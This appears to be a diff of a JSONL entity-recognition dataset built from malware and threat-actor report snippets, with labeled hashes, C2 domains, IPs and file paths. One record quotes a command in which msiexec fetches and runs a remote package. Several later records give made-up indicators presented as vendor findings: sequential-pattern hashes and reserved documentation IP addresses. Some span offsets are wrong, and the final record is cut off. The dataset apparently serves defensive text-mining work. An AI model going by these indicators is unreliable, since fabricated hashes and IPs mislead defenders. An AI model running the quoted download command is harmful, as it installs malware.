+ {"text": "Further Latrodectus SHA256 indicators from Proofpoint include 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491, aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119, 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e, 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0, 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017, and e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a. Additional samples: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e, 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05, edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a, 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec, and 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9.", "spans": {"MALWARE: Latrodectus": [[8, 19]], "ORGANIZATION: Proofpoint": [[43, 53]], "HASH: 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491": [[62, 126]], "HASH: aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119": [[128, 192]], "HASH: 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e": [[194, 258]], "HASH: 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0": [[260, 324]], "HASH: 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017": [[326, 390]], "HASH: e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a": [[396, 460]], "HASH: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e": [[482, 546]], "HASH: 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05": [[548, 612]], "HASH: edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a": [[614, 678]], "HASH: 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec": [[680, 744]], "HASH: 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9": [[750, 814]]}, "info": {"id": "malware_00009", "source": "malware_reports"}}
10
+ {"text": "The final batch of Latrodectus SHA256 hashes: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea, 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef, 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492, 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc, a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22, 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794, 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446, ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f, 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567, 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea, and 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9.", "spans": {"MALWARE: Latrodectus": [[19, 30]], "HASH: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea": [[46, 110]], "HASH: 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef": [[112, 176]], "HASH: 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492": [[178, 242]], "HASH: 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc": [[244, 308]], "HASH: a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22": [[310, 374]], "HASH: 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794": [[376, 440]], "HASH: 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446": [[442, 506]], "HASH: ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f": [[508, 572]], "HASH: 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567": [[574, 638]], "HASH: 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea": [[640, 704]], "HASH: 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9": [[710, 774]]}, "info": {"id": "malware_00010", "source": "malware_reports"}}
11
+ {"text": "Latrodectus C2 infrastructure identified by Proofpoint includes the following domains: arsimonopa.com, lemonimonakio.com, fluraresto.me, mastralakkot.live, postolwepok.tech, trasenanoyr.best, miistoria.com, plwskoret.top, sluitionsbad.tech, grebiunti.top, zumkoshapsret.com, jertacco.com, popfealt.one, ginzbargatey.tech, minndarespo.icu, drifajizo.fun, and titnovacrion.top. All domains communicate via HTTPS POST requests to the /live/ endpoint.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "ORGANIZATION: Proofpoint": [[44, 54]], "DOMAIN: arsimonopa.com": [[87, 101]], "DOMAIN: lemonimonakio.com": [[103, 120]], "DOMAIN: fluraresto.me": [[122, 135]], "DOMAIN: mastralakkot.live": [[137, 154]], "DOMAIN: postolwepok.tech": [[156, 172]], "DOMAIN: trasenanoyr.best": [[174, 190]], "DOMAIN: miistoria.com": [[192, 205]], "DOMAIN: plwskoret.top": [[207, 220]], "DOMAIN: sluitionsbad.tech": [[222, 239]], "DOMAIN: grebiunti.top": [[241, 254]], "DOMAIN: zumkoshapsret.com": [[256, 273]], "DOMAIN: jertacco.com": [[275, 287]], "DOMAIN: popfealt.one": [[289, 301]], "DOMAIN: ginzbargatey.tech": [[303, 320]], "DOMAIN: minndarespo.icu": [[322, 337]], "DOMAIN: drifajizo.fun": [[339, 352]], "DOMAIN: titnovacrion.top": [[358, 374]]}, "info": {"id": "malware_00011", "source": "malware_reports"}}
12
+ {"text": "Latrodectus payload distribution infrastructure includes the URLs hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php, hxxp://superior-coin.com/ga/index.php, hxxp://superior-coin.com/ga/m/6.dll, and hxxp://sokingscrosshotel.com/share/upd.msi. DanaBot C2 servers associated with Latrodectus campaigns were observed at 77.91.73.187:443 and 74.119.193.200:443. Detection signatures include ET MALWARE Latrodectus Related Activity and ET MALWARE DNS Query to Latrodectus Domains.", "spans": {"MALWARE: Latrodectus": [[0, 11], [290, 301], [410, 421], [467, 478]], "URL: hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php": [[66, 129]], "URL: hxxp://superior-coin.com/ga/index.php": [[131, 168]], "URL: hxxp://superior-coin.com/ga/m/6.dll": [[170, 205]], "URL: hxxp://sokingscrosshotel.com/share/upd.msi": [[211, 253]], "MALWARE: DanaBot": [[255, 262]], "IP_ADDRESS: 77.91.73.187": [[329, 341]], "IP_ADDRESS: 74.119.193.200": [[350, 364]]}, "info": {"id": "malware_00012", "source": "malware_reports"}}
13
+ {"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info.services, pmd-offc.info, dirctt888.com, mods.email, dowmload.co, downl0ad.org, d0wnlaod.org, dirctt88.info, directt88.com, aliyum.email, d0cumentview.info, debcon.live, document-viewer.live, documentviewer.info, ms-office.pro, pncert.info, session-out.com, ziptec.info, depo-govpk.com, crontec.site, mteron.info, mevron.tech, and veorey.live. Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"THREAT_ACTOR: SideWinder": [[11, 21]], "ORGANIZATION: Kaspersky": [[47, 56]], "DOMAIN: modpak-info.services": [[65, 85]], "DOMAIN: pmd-offc.info": [[87, 100]], "DOMAIN: dirctt888.com": [[102, 115]], "DOMAIN: mods.email": [[117, 127]], "DOMAIN: dowmload.co": [[129, 140]], "DOMAIN: downl0ad.org": [[142, 154]], "DOMAIN: d0wnlaod.org": [[156, 168]], "DOMAIN: dirctt88.info": [[170, 183]], "DOMAIN: directt88.com": [[185, 198]], "DOMAIN: aliyum.email": [[200, 212]], "DOMAIN: d0cumentview.info": [[214, 231]], "DOMAIN: debcon.live": [[233, 244]], "DOMAIN: document-viewer.live": [[246, 266]], "DOMAIN: documentviewer.info": [[268, 287]], "DOMAIN: ms-office.pro": [[289, 302]], "DOMAIN: pncert.info": [[304, 315]], "DOMAIN: session-out.com": [[317, 332]], "DOMAIN: ziptec.info": [[334, 345]], "DOMAIN: depo-govpk.com": [[347, 361]], "DOMAIN: crontec.site": [[363, 375]], "DOMAIN: mteron.info": [[377, 388]], "DOMAIN: mevron.tech": [[390, 401]], "DOMAIN: veorey.live": [[407, 418]], "HASH: e0bce049c71bc81afe172cd30be4d2b7": [[444, 476]], "HASH: 872c2ddf6467b1220ee83dca0e118214": [[478, 510]], "HASH: 3d9961991e7ae6ad2bae09c475a1bce8": [[512, 544]], "HASH: a694ccdb82b061c26c35f612d68ed1c2": [[546, 578]], "HASH: f42ba43f7328cbc9ce85b2482809ff1c": [[580, 612]], "HASH: 
0216ffc6fb679bdf4ea6ee7051213c1e": [[614, 646]], "HASH: 433480f7d8642076a8b3793948da5efe": [[652, 684]]}, "info": {"id": "malware_00013", "source": "malware_reports"}}
14
+ {"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0.fo, t1.cx, and v0.cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i http://q0.fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185.220.101.34 and 185.220.101.58.", "spans": {"MALWARE: Raspberry Robin": [[0, 15]], "THREAT_ACTOR: DEV-0856": [[99, 107]], "TOOL: msiexec.exe": [[126, 137]], "SYSTEM: QNAP": [[176, 180]], "DOMAIN: q0.fo": [[222, 227], [408, 413]], "DOMAIN: t1.cx": [[229, 234]], "DOMAIN: v0.cx": [[240, 245]], "FILEPATH: C:\\Users\\Public\\Libraries\\": [[274, 300]], "FILEPATH: C:\\Windows\\Temp\\": [[305, 321]], "TOOL: cmd.exe": [[346, 353]], "URL: http://q0.fo/b.msi": [[401, 419]], "HASH: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[451, 515]], "HASH: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[524, 556]], "MALWARE: Cobalt Strike": [[598, 611]], "MALWARE: IcedID": [[613, 619]], "MALWARE: Bumblebee": [[625, 634]], "IP_ADDRESS: 185.220.101.34": [[700, 714]], "IP_ADDRESS: 185.220.101.58": [[719, 733]]}, "info": {"id": "malware_00014", "source": "malware_reports"}}
15
+ {"text": "ESET researchers discovered DynoWiper, a destructive wiper malware targeting Poland's energy sector. The malware overwrites the Master Boot Record and encrypts files with the extensions .doc, .xls, .pdf, .pptx, and .sql. The wiper binary had SHA256 hash a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f and was delivered via spear-phishing emails impersonating the Polish energy regulator URE. The malware was executed from C:\\Windows\\System32\\svchost_update.exe and communicated with C2 server at 91.234.56.78. The dropper connected to download.energy-update.com to retrieve secondary payloads. The attack also leveraged PowerShell scripts stored at C:\\ProgramData\\Microsoft\\Updates\\sync.ps1 and used certutil to decode base64-encoded payloads.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: DynoWiper": [[28, 37]], "HASH: a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f": [[254, 318]], "ORGANIZATION: URE": [[405, 408]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[440, 478]], "IP_ADDRESS: 91.234.56.78": [[514, 526]], "DOMAIN: download.energy-update.com": [[553, 579]], "TOOL: PowerShell": [[638, 648]], "FILEPATH: C:\\ProgramData\\Microsoft\\Updates\\sync.ps1": [[667, 708]], "TOOL: certutil": [[718, 726]]}, "info": {"id": "malware_00015", "source": "malware_reports"}}
16
+ {"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365.com and login-sharepoint.org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194.58.112.43 and 89.34.27.199. The group also deployed Brute Ratel C4 from C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "THREAT_ACTOR: Cozy Bear": [[21, 30]], "THREAT_ACTOR: Midnight Blizzard": [[59, 76]], "ORGANIZATION: Microsoft": [[46, 55]], "TOOL: rundll32.exe": [[260, 272]], "HASH: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "FILEPATH: C:\\Users\\Public\\Documents\\config.dll": [[380, 416]], "DOMAIN: auth-microsoft365.com": [[453, 474], [636, 657]], "DOMAIN: login-sharepoint.org": [[479, 499]], "URL: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[628, 694]], "IP_ADDRESS: 194.58.112.43": [[738, 751]], "IP_ADDRESS: 89.34.27.199": [[756, 768]], "MALWARE: Brute Ratel C4": [[794, 808]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe": [[814, 859]]}, "info": {"id": "malware_00016", "source": "malware_reports"}}
17
+ {"text": "The Medusa ransomware group emerged in 2023 and operates a ransomware-as-a-service model. CISA released advisory AA25-071A documenting Medusa's tactics. The ransomware binary typically has filename gaze.exe or medusa_locker.exe and is deployed after initial access via exposed RDP services or phishing. Medusa uses the legitimate tool PsExec for lateral movement and deploys Advanced IP Scanner for network reconnaissance. The ransomware appends the .MEDUSA extension to encrypted files and drops a ransom note named !!!READ_ME_MEDUSA!!!.txt. Known C2 infrastructure includes the domains medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion and medusa-blog.xyz. Observed IP addresses used for data exfiltration: 45.8.146.23, 193.233.133.58, and 91.92.242.87. File hashes associated with Medusa include SHA256 c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2 and MD5 b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7.", "spans": {"MALWARE: Medusa": [[4, 10], [135, 141], [303, 309], [796, 802]], "ORGANIZATION: CISA": [[90, 94]], "FILEPATH: gaze.exe": [[198, 206]], "FILEPATH: medusa_locker.exe": [[210, 227]], "TOOL: PsExec": [[335, 341]], "TOOL: Advanced IP Scanner": [[375, 394]], "FILEPATH: !!!READ_ME_MEDUSA!!!.txt": [[517, 541]], "DOMAIN: medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion": [[588, 649]], "DOMAIN: medusa-blog.xyz": [[654, 669]], "IP_ADDRESS: 45.8.146.23": [[721, 732]], "IP_ADDRESS: 193.233.133.58": [[734, 748]], "IP_ADDRESS: 91.92.242.87": [[754, 766]], "HASH: c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2": [[818, 882]], "HASH: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7": [[891, 923]]}, "info": {"id": "malware_00017", "source": "malware_reports"}}
18
+ {"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203.0.113.42, 198.51.100.73, and 192.0.2.156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203.0.113.42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. Additional C2 domains include update-service-ms.com and cdn-office365.net. Associated email addresses used in phishing: invoice@update-service-ms.com and admin@cdn-office365.net.", "spans": {"MALWARE: QakBot": [[41, 47], [476, 482]], "MALWARE: Qbot": [[63, 67]], "MALWARE: Pinkslipbot": [[72, 83]], "ORGANIZATION: FBI": [[12, 15]], "HASH: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "IP_ADDRESS: 203.0.113.42": [[268, 280], [440, 452]], "IP_ADDRESS: 198.51.100.73": [[282, 295]], "IP_ADDRESS: 192.0.2.156": [[301, 312]], "SYSTEM: OneNote": [[357, 364]], "TOOL: PowerShell": [[384, 394]], "URL: hxxp://203.0.113.42/updates/kb5034441.dll": [[433, 474]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll": [[550, 600]], "SYSTEM: wermgr.exe": [[646, 656]], "SYSTEM: explorer.exe": [[661, 673]], "DOMAIN: update-service-ms.com": [[717, 738], [815, 836]], "DOMAIN: cdn-office365.net": [[743, 760], [847, 864]], "EMAIL: invoice@update-service-ms.com": [[807, 836]], "EMAIL: admin@cdn-office365.net": [[841, 864]]}, "info": {"id": "malware_00018", "source": "malware_reports"}}
19
+ {"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172.16.45.3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185.174.137.92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite.onion.", "spans": {"MALWARE: BlackCat": [[4, 12]], "MALWARE: ALPHV": [[41, 46]], "SYSTEM: VMware ESXi": [[89, 100], [310, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187], [769, 809]], "CVE_ID: CVE-2024-37085": [[292, 306]], "IP_ADDRESS: 172.16.45.3": [[409, 420]], "FILEPATH: /tmp/esxi_encrypt": [[452, 469]], "FILEPATH: /tmp/.config.json": [[514, 531]], "TOOL: rclone": [[577, 583]], "IP_ADDRESS: 185.174.137.92": [[635, 649]], "HASH: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[677, 741]], "HASH: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[746, 810]], "DOMAIN: alphv-paymentsite.onion": [[846, 869]]}, "info": {"id": "malware_00019", "source": "malware_reports"}}
20
+ {"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader.chainfund.io and exchange-data.cryptonode.org on port 8443. Malicious payloads were hosted at hxxps://api-trader.chainfund.io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104.168.174.22 and 107.189.10.143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes.io.", "spans": {"THREAT_ACTOR: Lazarus Group": [[0, 13]], "THREAT_ACTOR: Hidden Cobra": [[29, 41]], "ORGANIZATION: FBI": [[152, 155]], "ORGANIZATION: CISA": [[160, 164]], "HASH: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "HASH: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "DOMAIN: api-trader.chainfund.io": [[491, 514], [604, 627]], "DOMAIN: exchange-data.cryptonode.org": [[519, 547]], "URL: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[596, 651]], "FILEPATH: /Library/Application Support/.daemon/updater": [[683, 727]], "FILEPATH: ~/Library/LaunchAgents/com.apple.update.plist": [[732, 777]], "IP_ADDRESS: 104.168.174.22": [[821, 835]], "IP_ADDRESS: 107.189.10.143": [[840, 854]], "EMAIL: recruit@hrnodes.io": [[945, 963]], "SYSTEM: macOS": [[781, 786]], "SYSTEM: LinkedIn": [[899, 907]]}, "info": {"id": "malware_00020", "source": "malware_reports"}}
21
+ {"text": "Volt Typhoon, a Chinese state-sponsored threat actor, targeted U.S. critical infrastructure using living-off-the-land techniques. Microsoft and the Five Eyes intelligence alliance published advisories. The group gained initial access through Fortinet FortiGuard devices exploiting CVE-2024-21762. Post-compromise activity relied on netsh, ntdsutil, PowerShell, and wmic for discovery and credential access. The attackers used compromised SOHO routers at IP addresses 24.199.247.13, 67.230.163.214, and 162.245.191.78 as operational relay infrastructure. Web shells were deployed to C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx. Lateral movement used PsExec and Windows Management Instrumentation. Exfiltrated data was staged at C:\\Windows\\Temp\\cab_extract\\ before transfer. No custom malware was deployed; the group relied entirely on built-in Windows tools including cmd.exe, certutil, and bitsadmin.", "spans": {"THREAT_ACTOR: Volt Typhoon": [[0, 12]], "ORGANIZATION: Microsoft": [[130, 139]], "SYSTEM: Fortinet FortiGuard": [[242, 261]], "CVE_ID: CVE-2024-21762": [[281, 295]], "TOOL: netsh": [[332, 337]], "TOOL: ntdsutil": [[339, 347]], "TOOL: PowerShell": [[349, 359]], "TOOL: wmic": [[365, 369]], "IP_ADDRESS: 24.199.247.13": [[467, 480]], "IP_ADDRESS: 67.230.163.214": [[482, 496]], "IP_ADDRESS: 162.245.191.78": [[502, 516]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx": [[582, 636]], "TOOL: PsExec": [[660, 666]], "FILEPATH: C:\\Windows\\Temp\\cab_extract\\": [[738, 766]], "TOOL: cmd.exe": [[878, 885]], "TOOL: certutil": [[887, 895]], "TOOL: bitsadmin": [[901, 910]], "SYSTEM: Windows": [[671, 678], [741, 748], [854, 861]]}, "info": {"id": "malware_00021", "source": "malware_reports"}}
22
+ {"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91.245.228.56 and 176.57.215.92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10.25.100.1 and 10.25.100.2.", "spans": {"THREAT_ACTOR: Sandworm": [[0, 8]], "ORGANIZATION: GRU": [[33, 36]], "THREAT_ACTOR: Seashell Blizzard": [[76, 93]], "ORGANIZATION: Microsoft": [[63, 72]], "MALWARE: Industroyer2": [[180, 192], [682, 694]], "MALWARE: CaddyWiper": [[256, 266]], "HASH: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "SYSTEM: Windows": [[360, 367]], "MALWARE: OrcShred": [[409, 417]], "SYSTEM: Linux": [[428, 433]], "SYSTEM: Solaris": [[438, 445]], "HASH: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "IP_ADDRESS: 91.245.228.56": [[562, 575]], "IP_ADDRESS: 176.57.215.92": [[580, 593]], "FILEPATH: /var/tmp/.update.sh": [[630, 649]], "FILEPATH: /opt/oracle/extproc.sh": [[654, 676]], "IP_ADDRESS: 10.25.100.1": [[808, 819]], "IP_ADDRESS: 10.25.100.2": [[824, 835]]}, "info": {"id": "malware_00022", "source": "malware_reports"}}
23
+ {"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates.com at IP 185.219.52.229. Additional C2 domains: api-gateway-service.com and storage-cloud-backup.net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45.129.14.88 and 91.195.240.117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: Carbanak Group": [[20, 34]], "CVE_ID: CVE-2023-36884": [[189, 203]], "SYSTEM: Microsoft Office": [[207, 223]], "MALWARE: Lizar": [[263, 268], [723, 728]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js": [[285, 325]], "DOMAIN: cdn-static-updates.com": [[356, 378]], "IP_ADDRESS: 185.219.52.229": [[385, 399]], "DOMAIN: api-gateway-service.com": [[424, 447]], "DOMAIN: storage-cloud-backup.net": [[452, 476]], "MALWARE: Carbanak": [[20, 28], [502, 510]], "HASH: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[528, 592]], "TOOL: BloodHound": [[603, 613]], "MALWARE: Cobalt Strike": [[651, 664]], "IP_ADDRESS: 45.129.14.88": [[686, 698]], "IP_ADDRESS: 91.195.240.117": [[703, 717]]}, "info": {"id": "malware_00023", "source": "malware_reports"}}
24
+ {"text": "Akira ransomware emerged in March 2023 and has targeted over 250 organizations globally. The ransomware group maintains a Tor-based leak site at akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion. Initial access is commonly gained through Cisco VPN appliances exploiting CVE-2023-20269. The ransomware binary (SHA256 hash f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3) encrypts files with the .akira extension. The group uses AnyDesk and RustDesk for remote access, WinSCP for data exfiltration, and Mimikatz for credential dumping. Ransomware deployment scripts are staged at C:\\Windows\\Temp\\deploy.bat and network shares are encrypted via C:\\Users\\Public\\w.exe. C2 IP addresses: 89.105.198.42, 194.26.135.119, and 45.227.255.13. Exfiltrated data is uploaded to mega.nz and transferred via rclone. The decryptor for paying victims is hosted at hxxps://akiradecrypt.org/recover/index.html.", "spans": {"MALWARE: Akira": [[0, 5]], "DOMAIN: akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion": [[145, 207]], "SYSTEM: Cisco VPN": [[251, 260]], "CVE_ID: CVE-2023-20269": [[283, 297]], "HASH: f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3": [[334, 398]], "TOOL: AnyDesk": [[457, 464]], "TOOL: RustDesk": [[469, 477]], "TOOL: WinSCP": [[497, 503]], 